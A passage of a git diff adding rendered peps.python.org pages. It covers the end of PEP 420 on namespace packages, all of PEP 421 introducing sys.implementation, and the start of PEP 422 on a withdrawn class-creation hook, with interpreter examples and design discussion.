  • Portions of namespace packages need not all come from the same +directory structure, or even from the same loader. Regular packages +are self-contained: all parts live in the same directory hierarchy.
  • +
  • Namespace packages have no __file__ attribute.
  • +
  • Namespace packages’ __path__ attribute is a read-only iterable +of strings, which is automatically updated when the parent path is +modified.
  • +
  • Namespace packages have no __init__.py module.
  • +
  • Namespace packages have a different type of object for their +__loader__ attribute.
  • +
+
+
+

Namespace packages in the standard library

+

It is possible, and this PEP explicitly allows, that parts of the +standard library be implemented as namespace packages. When and if +any standard library packages become namespace packages is outside the +scope of this PEP.

+
+
+

Migrating from legacy namespace packages

+

As described above, prior to this PEP pkgutil.extend_path() was +used by legacy portions to create namespace packages. Because it is +likely not practical for all existing portions of a namespace package +to be migrated to this PEP at once, extend_path() will be modified +to also recognize PEP 420 namespace packages. This will allow some +portions of a namespace to be legacy portions while others are +migrated to PEP 420. These hybrid namespace packages will not have +the dynamic path computation that normal namespace packages have, +since extend_path() never provided this functionality in the past.

+
+
+
+

Packaging Implications

+

Multiple portions of a namespace package can be installed into the +same directory, or into separate directories. For this section, +suppose there are two portions which define “foo.bar” and “foo.baz”. +“foo” itself is a namespace package.

+

If these are installed in the same location, a single directory “foo” +would be in a directory that is on sys.path. Inside “foo” would +be two directories, “bar” and “baz”. If “foo.bar” is removed (perhaps +by an OS package manager), care must be taken not to remove the +“foo/baz” or “foo” directories. Note that in this case “foo” will be +a namespace package (because it lacks an __init__.py), even though +all of its portions are in the same directory.

+

Note that “foo.bar” and “foo.baz” can be installed into the same “foo” +directory because they will not have any files in common.

+

If the portions are installed in different locations, two different +“foo” directories would be in directories that are on sys.path. +“foo/bar” would be in one of these sys.path entries, and “foo/baz” +would be in the other. Upon removal of “foo.bar”, the “foo/bar” and +corresponding “foo” directories can be completely removed. But +“foo/baz” and its corresponding “foo” directory cannot be removed.

+

It is also possible to have the “foo.bar” portion installed in a +directory on sys.path, and have the “foo.baz” portion provided in +a zip file, also on sys.path.

+
+
+

Examples

+
+

Nested namespace packages

+

This example uses the following directory structure:

+
Lib/test/namespace_pkgs
+    project1
+        parent
+            child
+                one.py
+    project2
+        parent
+            child
+                two.py
+
+
+

Here, both parent and child are namespace packages: Portions of them +exist in different directories, and they do not have __init__.py +files.

+

Here we add the parent directories to sys.path, and show that the +portions are correctly found:

+
>>> import sys
+>>> sys.path += ['Lib/test/namespace_pkgs/project1', 'Lib/test/namespace_pkgs/project2']
+>>> import parent.child.one
+>>> parent.__path__
+_NamespacePath(['Lib/test/namespace_pkgs/project1/parent', 'Lib/test/namespace_pkgs/project2/parent'])
+>>> parent.child.__path__
+_NamespacePath(['Lib/test/namespace_pkgs/project1/parent/child', 'Lib/test/namespace_pkgs/project2/parent/child'])
+>>> import parent.child.two
+>>>
+
+
+
+
+

Dynamic path computation

+

This example uses a similar directory structure, but adds a third +portion:

+
Lib/test/namespace_pkgs
+    project1
+        parent
+            child
+                one.py
+    project2
+        parent
+            child
+                two.py
+    project3
+        parent
+            child
+                three.py
+
+
+

We add project1 and project2 to sys.path, then import +parent.child.one and parent.child.two. Then we add the +project3 to sys.path and when parent.child.three is +imported, project3/parent is automatically added to +parent.__path__:

+
# add the first two parent paths to sys.path
+>>> import sys
+>>> sys.path += ['Lib/test/namespace_pkgs/project1', 'Lib/test/namespace_pkgs/project2']
+
+# parent.child.one can be imported, because project1 was added to sys.path:
+>>> import parent.child.one
+>>> parent.__path__
+_NamespacePath(['Lib/test/namespace_pkgs/project1/parent', 'Lib/test/namespace_pkgs/project2/parent'])
+
+# parent.child.__path__ contains project1/parent/child and project2/parent/child, but not project3/parent/child:
+>>> parent.child.__path__
+_NamespacePath(['Lib/test/namespace_pkgs/project1/parent/child', 'Lib/test/namespace_pkgs/project2/parent/child'])
+
+# parent.child.two can be imported, because project2 was added to sys.path:
+>>> import parent.child.two
+
+# we cannot import parent.child.three, because project3 is not in the path:
+>>> import parent.child.three
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "<frozen importlib._bootstrap>", line 1286, in _find_and_load
+  File "<frozen importlib._bootstrap>", line 1250, in _find_and_load_unlocked
+ImportError: No module named 'parent.child.three'
+
+# now add project3 to sys.path:
+>>> sys.path.append('Lib/test/namespace_pkgs/project3')
+
+# and now parent.child.three can be imported:
+>>> import parent.child.three
+
+# project3/parent has been added to parent.__path__:
+>>> parent.__path__
+_NamespacePath(['Lib/test/namespace_pkgs/project1/parent', 'Lib/test/namespace_pkgs/project2/parent', 'Lib/test/namespace_pkgs/project3/parent'])
+
+# and project3/parent/child has been added to parent.child.__path__
+>>> parent.child.__path__
+_NamespacePath(['Lib/test/namespace_pkgs/project1/parent/child', 'Lib/test/namespace_pkgs/project2/parent/child', 'Lib/test/namespace_pkgs/project3/parent/child'])
+>>>
+
+
+
+
+
+

Discussion

+

At PyCon 2012, we had a discussion about namespace packages at which +PEP 382 and PEP 402 were rejected, to be replaced by this PEP [3].

+

There is no intention to remove support of regular packages. If a +developer knows that her package will never be a portion of a +namespace package, then there is a performance advantage to it being a +regular package (with an __init__.py). Creation and loading of a +regular package can take place immediately when it is located along +the path. With namespace packages, all entries in the path must be +scanned before the package is created.

+

Note that an ImportWarning will no longer be raised for a directory +lacking an __init__.py file. Such a directory will now be +imported as a namespace package, whereas in prior Python versions an +ImportWarning would be raised.

+

Alyssa (Nick) Coghlan presented a list of her objections to this proposal [4]. +They are:

+
    +
  1. Implicit package directories go against the Zen of Python.
  2. +
  3. Implicit package directories pose awkward backwards compatibility +challenges.
  4. +
  5. Implicit package directories introduce ambiguity into file system +layouts.
  6. +
  7. Implicit package directories will permanently entrench current +newbie-hostile behavior in __main__.
  8. +
+

Alyssa later gave a detailed response to her own objections [5], which +is summarized here:

+
    +
  1. The practicality of this PEP wins over other proposals and the +status quo.
  2. +
  3. Minor backward compatibility issues are okay, as long as they are +properly documented.
  4. +
  5. This will be addressed in PEP 395.
  6. +
  7. This will also be addressed in PEP 395.
  8. +
+

The inclusion of namespace packages in the standard library was +motivated by Martin v. Löwis, who wanted the encodings package to +become a namespace package [6]. While this PEP allows for standard +library packages to become namespaces, it defers a decision on +encodings.

+
+

find_module versus find_loader

+

An early draft of this PEP specified a change to the find_module +method in order to support namespace packages. It would be modified +to return a string in the case where a namespace package portion was +discovered.

+

However, this caused a problem with existing code outside of the +standard library which calls find_module. Because this code would +not be upgraded in concert with changes required by this PEP, it would +fail when it would receive unexpected return values from +find_module. Because of this incompatibility, this PEP now +specifies that finders that want to provide namespace portions must +implement the find_loader method, described above.

+

The use case for supporting multiple portions per find_loader call +is given in [7].

+
+
+

Dynamic path computation

+

Guido raised a concern that automatic dynamic path computation was an +unnecessary feature [8]. Later in that thread, PJ Eby and Alyssa +Coghlan presented arguments as to why dynamic computation would +minimize surprise to Python users. The conclusion of that discussion +has been included in this PEP’s Rationale section.

+

An earlier version of this PEP required that dynamic path computation +could only take affect if the parent path object were modified +in-place. That is, this would work:

+
sys.path.append('new-dir')
+
+
+

But this would not:

+
sys.path = sys.path + ['new-dir']
+
+
+

In the same thread [8], it was pointed out that this restriction is +not required. If the parent path is looked up by name instead of by +holding a reference to it, then there is no restriction on how the +parent path is modified or replaced. For a top-level namespace +package, the lookup would be the module named "sys" then its +attribute "path". For a namespace package nested inside a package +foo, the lookup would be for the module named "foo" then its +attribute "__path__".

+
+
+
+

Module reprs

+

Previously, module reprs were hard coded based on assumptions about a module’s +__file__ attribute. If this attribute existed and was a string, it was +assumed to be a file system path, and the module object’s repr would include +this in its value. The only exception was that PEP 302 reserved missing +__file__ attributes to built-in modules, and in CPython, this assumption +was baked into the module object’s implementation. Because of this +restriction, some modules contained contrived __file__ values that did not +reflect file system paths, and which could cause unexpected problems later +(e.g. os.path.join() on a non-path __file__ would return gibberish).

+

This PEP relaxes this constraint, and leaves the setting of __file__ to +the purview of the loader producing the module. Loaders may opt to leave +__file__ unset if no file system path is appropriate. Loaders may also +set additional reserved attributes on the module if useful. This means that +the definitive way to determine the origin of a module is to check its +__loader__ attribute.

+

For example, namespace packages as described in this PEP will have no +__file__ attribute because no corresponding file exists. In order to +provide flexibility and descriptiveness in the reprs of such modules, a new +optional protocol is added to PEP 302 loaders. Loaders can implement a +module_repr() method which takes a single argument, the module object. +This method should return the string to be used verbatim as the repr of the +module. The rules for producing a module repr are now standardized as:

+
    +
  • If the module has an __loader__ and that loader has a module_repr() +method, call it with a single argument, which is the module object. The +value returned is used as the module’s repr.
  • +
  • If an exception occurs in module_repr(), the exception is +caught and discarded, and the calculation of the module’s repr +continues as if module_repr() did not exist.
  • +
  • If the module has an __file__ attribute, this is used as part of the +module’s repr.
  • +
  • If the module has no __file__ but does have an __loader__, then the +loader’s repr is used as part of the module’s repr.
  • +
  • Otherwise, just use the module’s __name__ in the repr.
  • +
+

Here is a snippet showing how namespace module reprs are calculated +from its loader:

+
class NamespaceLoader:
+    @classmethod
+    def module_repr(cls, module):
+        return "<module '{}' (namespace)>".format(module.__name__)
+
+
+

Built-in module reprs would no longer need to be hard-coded, but +instead would come from their loader as well:

+
class BuiltinImporter:
+    @classmethod
+    def module_repr(cls, module):
+        return "<module '{}' (built-in)>".format(module.__name__)
+
+
+

Here are some example reprs of different types of modules with +different sets of the related attributes:

+
>>> import email
+>>> email
+<module 'email' from '/home/barry/projects/python/pep-420/Lib/email/__init__.py'>
+>>> m = type(email)('foo')
+>>> m
+<module 'foo'>
+>>> m.__file__ = 'zippy:/de/do/dah'
+>>> m
+<module 'foo' from 'zippy:/de/do/dah'>
+>>> class Loader: pass
+...
+>>> m.__loader__ = Loader
+>>> del m.__file__
+>>> m
+<module 'foo' (<class '__main__.Loader'>)>
+>>> class NewLoader:
+...   @classmethod
+...   def module_repr(cls, module):
+...      return '<mystery module!>'
+...
+>>> m.__loader__ = NewLoader
+>>> m
+<mystery module!>
+>>>
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0420.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0421/index.html b/pep-0421/index.html new file mode 100644 index 00000000000..16adf79eb96 --- /dev/null +++ b/pep-0421/index.html @@ -0,0 +1,631 @@ + + + + + + + + PEP 421 – Adding sys.implementation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 421 – Adding sys.implementation

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
BDFL-Delegate:
+
Barry Warsaw
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Apr-2012
+
Python-Version:
+
3.3
+
Post-History:
+
26-Apr-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces a new attribute for the sys module: +sys.implementation. The attribute holds consolidated information +about the implementation of the running interpreter. Thus +sys.implementation is the source to which the standard library may +look for implementation-specific information.

+

The proposal in this PEP is in line with a broader emphasis on making +Python friendlier to alternate implementations. It describes the new +variable and the constraints on what that variable contains. The PEP +also explains some immediate use cases for sys.implementation.

+
+
+

Motivation

+

For a number of years now, the distinction between Python-the-language +and CPython (the reference implementation) has been growing. Most of +this change is due to the emergence of Jython, IronPython, and PyPy as +viable alternate implementations of Python.

+

Consider, however, the nearly two decades of CPython-centric Python +(i.e. most of its existence). That focus has understandably +contributed to quite a few CPython-specific artifacts both in the +standard library and exposed in the interpreter. Though the core +developers have made an effort in recent years to address this, quite +a few of the artifacts remain.

+

Part of the solution is presented in this PEP: a single namespace in +which to consolidate implementation specifics. This will help focus +efforts to differentiate the implementation specifics from the +language. Additionally, it will foster a multiple-implementation +mindset.

+
+
+

Proposal

+

We will add a new attribute to the sys module, called +sys.implementation, as an object with attribute-access (as opposed +to a mapping). It will contain implementation-specific information.

+

The attributes of this object will remain fixed during interpreter +execution and through the course of an implementation version. This +ensures behaviors don’t change between versions which depend on +attributes of sys.implementation.

+

The object has each of the attributes described in the Required +Attributes section below. Those attribute names will never start +with an underscore. The standard library and the language definition +will rely only on those required attributes.

+

This proposal takes a conservative approach in requiring only a small +number of attributes. As more become appropriate, they may be added +with discretion, as described in Adding New Required Attributes.

+

While this PEP places no other constraints on sys.implementation, +it also recommends that no one rely on capabilities outside those +described here. The only exception to that recommendation is for +attributes starting with an underscore. Implementers may use those +as appropriate to store per-implementation data.

+
+

Required Attributes

+

These are attributes in sys.implementation on which the standard +library and language definition will rely, meaning implementers must +define them:

+
+
name
A lower-case identifier representing the implementation. Examples +include ‘pypy’, ‘jython’, ‘ironpython’, and ‘cpython’.
+
version
The version of the implementation, as opposed to the version of the +language it implements. This value conforms to the format described +in Version Format.
+
hexversion
The version of the implementation in the same hexadecimal format as +sys.hexversion.
+
cache_tag
A string used for the PEP 3147 cache tag. It would +normally be a composite of the name and version (e.g. ‘cpython-33’ +for CPython 3.3). However, an implementation may explicitly use a +different cache tag. If cache_tag is set to None, it indicates +that module caching should be disabled.
+
+
+
+

Adding New Required Attributes

+

In time more required attributes will be added to +sys.implementation. However, each must have a meaningful use case +across all Python implementations in order to be considered. This is +made most clear by a use case in the standard library or language +specification.

+

All proposals for new required attributes will go through the normal +PEP process. Such a PEP need not be long, just long enough. It will +need to sufficiently spell out the rationale for the new attribute, +its use cases, and the impact it will have on the various Python +implementations.

+
+
+

Version Format

+

A main point of sys.implementation is to contain information that +will be used internally in the standard library. In order to +facilitate the usefulness of the version attribute, its value should +be in a consistent format across implementations.

+

As such, the format of sys.implementation.version will follow that +of sys.version_info, which is effectively a named tuple. It is a +familiar format and generally consistent with normal version format +conventions.

+
+
+
+

Rationale

+

The status quo for implementation-specific information gives us that +information in a more fragile, harder to maintain way. It is spread +out over different modules or inferred from other information, as we +see with platform.python_implementation().

+

This PEP is the main alternative to that approach. It consolidates +the implementation-specific information into a single namespace and +makes explicit that which was implicit.

+
+

Type Considerations

+

It’s very easy to get bogged down in discussions about the type of +sys.implementation. However, its purpose is to support the +standard library and language definition. As such, there isn’t much +that really matters regarding its type, as opposed to a feature that +would be more generally used. Thus characteristics like immutability +and sequence-ness have been disregarded.

+

The only real choice has been between an object with attribute access +and a mapping with item access. This PEP espouses dotted access to +reflect the relatively fixed nature of the namespace.

+
+
+

Non-Required Attributes

+

Earlier versions of this PEP included a required attribute called +metadata that held any non-required, per-implementation data +[12]. However, this proved to be an unnecessary addition +considering the purpose of sys.implementation.

+

Ultimately, non-required attributes are virtually ignored in this PEP. +They have no impact other than that careless use may collide with +future required attributes. That, however, is but a marginal concern +for sys.implementation.

+
+
+

Why a Part of sys?

+

The sys module holds the new namespace because sys is the depot +for interpreter-centric variables and functions. Many +implementation-specific attributes are already found in sys.

+
+
+

Why Strict Constraints on Any of the Values?

+

As already noted in Version Format, values in +sys.implementation are intended for use by the standard library. +Constraining those values, essentially specifying an API for them, +allows them to be used consistently, regardless of how they are +otherwise implemented. However, care should be taken to not +over-specify the constraints.

+
+
+
+

Discussion

+

The topic of sys.implementation came up on the python-ideas list +in 2009, where the reception was broadly positive [1]. I +revived the discussion recently while working on a pure-python +imp.get_tag() [2]. Discussion has been ongoing +[3]. The messages in issue #14673 are also relevant.

+

A good part of the recent discussion centered on the type to use for +sys.implementation.

+
+
+

Use-cases

+
+

platform.python_implementation()

+

“explicit is better than implicit”

+

The platform module determines the python implementation by looking +for clues in a couple different sys variables [9]. However, +this approach is fragile, requiring changes to the standard library +each time an implementation changes. Beyond that, support in +platform is limited to those implementations that core developers +have blessed by special-casing them in the platform module.

+

With sys.implementation the various implementations would +explicitly set the values in their own version of the sys +module.

+

Another concern is that the platform module is part of the stdlib, +which ideally should minimize implementation details such as would be +moved to sys.implementation.

+

Any overlap between sys.implementation and the platform module +would simply defer to sys.implementation (with the same interface +in platform wrapping it).

+
+
+

Cache Tag Generation in Frozen Importlib

+

PEP 3147 defined the use of a module cache and cache tags for file +names. The importlib bootstrap code, frozen into the Python binary as +of 3.3, uses the cache tags during the import process. Part of the +project to bootstrap importlib has been to clean code out of +Python/import.c that did not need to be there any longer.

+

The cache tag defined in Python/import.c was +hard-coded +to "cpython" MAJOR MINOR. For importlib the options are +either hard-coding it in the same way, or guessing the implementation +in the same way as does platform.python_implementation().

+

As long as the hard-coded tag is limited to CPython-specific code, it +is livable. However, inasmuch as other Python implementations use the +importlib code to work with the module cache, a hard-coded tag would +become a problem.

+

Directly using the platform module in this case is a non-starter. +Any module used in the importlib bootstrap must be built-in or frozen, +neither of which apply to the platform module. This is the point +that led to the recent interest in sys.implementation.

+

Regardless of the outcome for the implementation name used, another +problem relates to the version used in the cache tag. That version is +likely to be the implementation version rather than the language +version. However, the implementation version is not readily +identified anywhere in the standard library.

+
+
+

Implementation-Specific Tests

+

Currently there are a number of implementation-specific tests in the +test suite under Lib/test. The test support module +(Lib/test/support.py) provides some functionality for dealing with +these tests. However, like the platform module, test.support +must do some guessing that sys.implementation would render +unnecessary.

+
+
+

Jython’s os.name Hack

+

In Jython, os.name is set to ‘java’ to accommodate special +treatment of the java environment in the standard library [10] +[11]. Unfortunately it masks the os name that would otherwise +go there. sys.implementation would help obviate the need for this +special case. Currently Jython sets os._name for the normal +os.name value.

+
+
+

The Problem With sys.(version|version_info|hexversion)

+

Earlier versions of this PEP made the mistake of calling +sys.version_info (and friends) the version of the Python language, +in contrast to the implementation. However, this is not the case. +Instead, it is the version of the CPython implementation. Incidentally, +the first two components of sys.version_info (major and minor) also +reflect the version of the language definition.

+

As Barry Warsaw noted, the “semantics of sys.version_info have been +sufficiently squishy in the past” [13]. With +sys.implementation we have the opportunity to improve this +situation by first establishing an explicit location for the version of +the implementation.

+

This PEP makes no other effort to directly clarify the semantics of +sys.version_info. Regardless, having an explicit version for the +implementation will definitely help to clarify the distinction from the +language version.

+
+
+
+

Feedback From Other Python Implementers

+
+

IronPython

+

Jeff Hardy responded to a request for feedback [4]. He +said, “I’ll probably add it the day after it’s approved” +[5]. He also gave useful feedback on both the type of +sys.implementation and on the metadata attribute (which has +since been removed from the PEP).

+
+
+

Jython

+

In 2009 Frank Wierzbicki said this (relative to Jython implementing the +required attributes) [6]:

+
Speaking for Jython, so far it looks like something we would adopt
+soonish after it was accepted (it looks pretty useful to me).
+
+
+
+
+

PyPy

+

Some of the PyPy developers have responded to a request for feedback +[7]. Armin Rigo said the following [8]:

+
For myself, I can only say that it looks like a good idea, which we
+will happily adhere to when we migrate to Python 3.3.
+
+
+

He also expressed support for keeping the required list small. Both +Armin and Laura Creighton indicated that an effort to better catalog +Python’s implementation would be welcome. Such an effort, for which +this PEP is a small start, will be considered separately.

+
+
+
+

Past Efforts

+
+

PEP 3139

+

PEP 3139, from 2008, recommended a clean-up of the sys module in +part by extracting implementation-specific variables and functions +into a separate module. PEP 421 is less ambitious version of that +idea. While PEP 3139 was rejected, its goals are reflected in PEP 421 +to a large extent, though with a much lighter approach.

+
+
+

PEP 399

+

PEP 399 dictates policy regarding the standard library, helping to make +it friendlier to alternate implementations. PEP 421 is proposed in +that same spirit.

+
+
+
+

The Bigger Picture

+

It’s worth noting again that this PEP is a small part of a larger +ongoing effort to identify the implementation-specific parts of Python +and mitigate their impact on alternate implementations.

+

sys.implementation is a focal point for implementation-specific +data, acting as a nexus for cooperation between the language, the +standard library, and the different implementations. As time goes by +it is feasible that sys.implementation will assume current +attributes of sys and other builtin/stdlib modules, where +appropriate. In this way, it is a PEP 3137-lite, but starting as +small as possible.

+

However, as already noted, many other efforts predate +sys.implementation. Neither is it necessarily a major part of the +effort. Rather, consider it as part of the infrastructure of the +effort to make Python friendlier to alternate implementations.

+
+
+

Alternatives

+

Since the single-namespace-under-sys approach is relatively +straightforward, no alternatives have been considered for this PEP.

+
+
+

Examples of Other Attributes

+

These are examples only and not part of the proposal. Most of them +were suggested during previous discussions, but did not fit into the +goals of this PEP. (See Adding New Required Attributes if they get +you excited.)

+
+
common_name
The case-sensitive name by which the implementation is known.
+
vcs_url
A URL for the main VCS repository for the implementation project.
+
vcs_revision_id
A value that identifies the VCS revision of the implementation.
+
build_toolchain
The tools used to build the interpreter.
+
build_date
The timestamp of when the interpreter was built.
+
homepage
The URL of the implementation’s website.
+
site_prefix
The preferred site prefix for the implementation.
+
runtime
The run-time environment in which the interpreter is running, as +in “Common Language Runtime” (.NET CLR) or “Java Runtime +Executable”.
+
gc_type
The type of garbage collection used, like “reference counting” or +“mark and sweep”.
+
+
+
+

Open Issues

+

Currently none.

+
+
+

Implementation

+

The implementation of this PEP is covered in issue #14673.

+
+
+

References

+ + + + + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0421.rst

+

Last modified: 2024-12-06 18:17:22 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0422/index.html b/pep-0422/index.html new file mode 100644 index 00000000000..3dcf2117962 --- /dev/null +++ b/pep-0422/index.html @@ -0,0 +1,660 @@ + + + + + + + + PEP 422 – Simpler customisation of class creation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 422 – Simpler customisation of class creation

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Daniel Urban <urban.dani+py at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
05-Jun-2012
+
Python-Version:
+
3.5
+
Post-History:
+
05-Jun-2012, 10-Feb-2013
+
+
+
+
Table of Contents +
+
+

Abstract

+

Currently, customising class creation requires the use of a custom metaclass. +This custom metaclass then persists for the entire lifecycle of the class, +creating the potential for spurious metaclass conflicts.

+

This PEP proposes to instead support a wide range of customisation +scenarios through a new namespace parameter in the class header, and +a new __autodecorate__ hook in the class body.

+

The new mechanism should be easier to understand and use than +implementing a custom metaclass, and thus should provide a gentler +introduction to the full power Python’s metaclass machinery.

+
+
+

PEP Withdrawal

+

This proposal has been withdrawn in favour of Martin Teichmann’s proposal +in PEP 487, which achieves the same goals through a simpler, easier to use +__init_subclass__ hook that simply isn’t invoked for the base class +that defines the hook.

+
+
+

Background

+

For an already created class cls, the term “metaclass” has a clear +meaning: it is the value of type(cls).

+

During class creation, it has another meaning: it is also used to refer to +the metaclass hint that may be provided as part of the class definition. +While in many cases these two meanings end up referring to one and the same +object, there are two situations where that is not the case:

+
    +
  • If the metaclass hint refers to an instance of type, then it is +considered as a candidate metaclass along with the metaclasses of all of +the parents of the class being defined. If a more appropriate metaclass is +found amongst the candidates, then it will be used instead of the one +given in the metaclass hint.
  • +
  • Otherwise, an explicit metaclass hint is assumed to be a factory function +and is called directly to create the class object. In this case, the final +metaclass will be determined by the factory function definition. In the +typical case (where the factory functions just calls type, or, in +Python 3.3 or later, types.new_class) the actual metaclass is then +determined based on the parent classes.
  • +
+

It is notable that only the actual metaclass is inherited - a factory +function used as a metaclass hook sees only the class currently being +defined, and is not invoked for any subclasses.

+

In Python 3, the metaclass hint is provided using the metaclass=Meta +keyword syntax in the class header. This allows the __prepare__ method +on the metaclass to be used to create the locals() namespace used during +execution of the class body (for example, specifying the use of +collections.OrderedDict instead of a regular dict).

+

In Python 2, there was no __prepare__ method (that API was added for +Python 3 by PEP 3115). Instead, a class body could set the __metaclass__ +attribute, and the class creation process would extract that value from the +class namespace to use as the metaclass hint. There is published code that +makes use of this feature.

+

Another new feature in Python 3 is the zero-argument form of the super() +builtin, introduced by PEP 3135. This feature uses an implicit __class__ +reference to the class being defined to replace the “by name” references +required in Python 2. Just as code invoked during execution of a Python 2 +metaclass could not call methods that referenced the class by name (as the +name had not yet been bound in the containing scope), similarly, Python 3 +metaclasses cannot call methods that rely on the implicit __class__ +reference (as it is not populated until after the metaclass has returned +control to the class creation machinery).

+

Finally, when a class uses a custom metaclass, it can pose additional +challenges to the use of multiple inheritance, as a new class cannot +inherit from parent classes with unrelated metaclasses. This means that +it is impossible to add a metaclass to an already published class: such +an addition is a backwards incompatible change due to the risk of metaclass +conflicts.

+
+
+

Proposal

+

This PEP proposes that a new mechanism to customise class creation be +added to Python 3.4 that meets the following criteria:

+
    +
  1. Integrates nicely with class inheritance structures (including mixins and +multiple inheritance)
  2. +
  3. Integrates nicely with the implicit __class__ reference and +zero-argument super() syntax introduced by PEP 3135
  4. +
  5. Can be added to an existing base class without a significant risk of +introducing backwards compatibility problems
  6. +
  7. Restores the ability for class namespaces to have some influence on the +class creation process (above and beyond populating the namespace itself), +but potentially without the full flexibility of the Python 2 style +__metaclass__ hook
  8. +
+

One mechanism that can achieve this goal is to add a new implicit class +decoration hook, modelled directly on the existing explicit class +decorators, but defined in the class body or in a parent class, rather than +being part of the class definition header.

+

Specifically, it is proposed that class definitions be able to provide a +class initialisation hook as follows:

+
class Example:
+    def __autodecorate__(cls):
+        # This is invoked after the class is created, but before any
+        # explicit decorators are called
+        # The usual super() mechanisms are used to correctly support
+        # multiple inheritance. The class decorator style signature helps
+        # ensure that invoking the parent class is as simple as possible.
+        cls = super().__autodecorate__()
+        return cls
+
+
+

To simplify the cooperative multiple inheritance case, object will gain +a default implementation of the hook that returns the class unmodified:

+
class object:
+    def __autodecorate__(cls):
+        return cls
+
+
+

If a metaclass wishes to block implicit class decoration for some reason, it +must arrange for cls.__autodecorate__ to trigger AttributeError.

+

If present on the created object, this new hook will be called by the class +creation machinery after the __class__ reference has been initialised. +For types.new_class(), it will be called as the last step before +returning the created class object. __autodecorate__ is implicitly +converted to a class method when the class is created (prior to the hook +being invoked).

+

Note, that when __autodecorate__ is called, the name of the class is not +yet bound to the new class object. As a consequence, the two argument form +of super() cannot be used to call methods (e.g., super(Example, cls) +wouldn’t work in the example above). However, the zero argument form of +super() works as expected, since the __class__ reference is already +initialised.

+

This general proposal is not a new idea (it was first suggested for +inclusion in the language definition more than 10 years ago, and a +similar mechanism has long been supported by Zope’s ExtensionClass), +but the situation has changed sufficiently in recent years that +the idea is worth reconsidering for inclusion as a native language feature.

+

In addition, the introduction of the metaclass __prepare__ method in PEP +3115 allows a further enhancement that was not possible in Python 2: this +PEP also proposes that type.__prepare__ be updated to accept a factory +function as a namespace keyword-only argument. If present, the value +provided as the namespace argument will be called without arguments +to create the result of type.__prepare__ instead of using a freshly +created dictionary instance. For example, the following will use +an ordered dictionary as the class namespace:

+
class OrderedExample(namespace=collections.OrderedDict):
+    def __autodecorate__(cls):
+        # cls.__dict__ is still a read-only proxy to the class namespace,
+        # but the underlying storage is an OrderedDict instance
+
+
+
+

Note

+

This PEP, along with the existing ability to use __prepare__ to share a +single namespace amongst multiple class objects, highlights a possible +issue with the attribute lookup caching: when the underlying mapping is +updated by other means, the attribute lookup cache is not invalidated +correctly (this is a key part of the reason class __dict__ attributes +produce a read-only view of the underlying storage).

+

Since the optimisation provided by that cache is highly desirable, +the use of a preexisting namespace as the class namespace may need to +be declared as officially unsupported (since the observed behaviour is +rather strange when the caches get out of sync).

+
+
+
+

Key Benefits

+
+

Easier use of custom namespaces for a class

+

Currently, to use a different type (such as collections.OrderedDict) for +a class namespace, or to use a pre-populated namespace, it is necessary to +write and use a custom metaclass. With this PEP, using a custom namespace +becomes as simple as specifying an appropriate factory function in the +class header.

+
+
+

Easier inheritance of definition time behaviour

+

Understanding Python’s metaclasses requires a deep understanding of +the type system and the class construction process. This is legitimately +seen as challenging, due to the need to keep multiple moving parts (the code, +the metaclass hint, the actual metaclass, the class object, instances of the +class object) clearly distinct in your mind. Even when you know the rules, +it’s still easy to make a mistake if you’re not being extremely careful. +An earlier version of this PEP actually included such a mistake: it +stated “subclass of type” for a constraint that is actually “instance of +type”.

+

Understanding the proposed implicit class decoration hook only requires +understanding decorators and ordinary method inheritance, which isn’t +quite as daunting a task. The new hook provides a more gradual path +towards understanding all of the phases involved in the class definition +process.

+
+
+

Reduced chance of metaclass conflicts

+

One of the big issues that makes library authors reluctant to use metaclasses +(even when they would be appropriate) is the risk of metaclass conflicts. +These occur whenever two unrelated metaclasses are used by the desired +parents of a class definition. This risk also makes it very difficult to +add a metaclass to a class that has previously been published without one.

+

By contrast, adding an __autodecorate__ method to an existing type poses +a similar level of risk to adding an __init__ method: technically, there +is a risk of breaking poorly implemented subclasses, but when that occurs, +it is recognised as a bug in the subclass rather than the library author +breaching backwards compatibility guarantees. In fact, due to the constrained +signature of __autodecorate__, the risk in this case is actually even +lower than in the case of __init__.

+
+
+

Integrates cleanly with PEP 3135

+

Unlike code that runs as part of the metaclass, code that runs as part of +the new hook will be able to freely invoke class methods that rely on the +implicit __class__ reference introduced by PEP 3135, including methods +that use the zero argument form of super().

+
+
+

Replaces many use cases for dynamic setting of __metaclass__

+

For use cases that don’t involve completely replacing the defined class, +Python 2 code that dynamically set __metaclass__ can now dynamically +set __autodecorate__ instead. For more advanced use cases, introduction of +an explicit metaclass (possibly made available as a required base class) will +still be necessary in order to support Python 3.

+
+
+
+

Design Notes

+
+

Determining if the class being decorated is the base class

+

In the body of an __autodecorate__ method, as in any other class method, +__class__ will be bound to the class declaring the method, while the +value passed in may be a subclass.

+

This makes it relatively straightforward to skip processing the base class +if necessary:

+
class Example:
+    def __autodecorate__(cls):
+        cls = super().__autodecorate__()
+        # Don't process the base class
+        if cls is __class__:
+            return
+        # Process subclasses here
+        ...
+
+
+
+
+

Replacing a class with a different kind of object

+

As an implicit decorator, __autodecorate__ is able to relatively easily +replace the defined class with a different kind of object. Technically +custom metaclasses and even __new__ methods can already do this +implicitly, but the decorator model makes such code much easier to understand +and implement.

+
class BuildDict:
+    def __autodecorate__(cls):
+        cls = super().__autodecorate__()
+        # Don't process the base class
+        if cls is __class__:
+            return
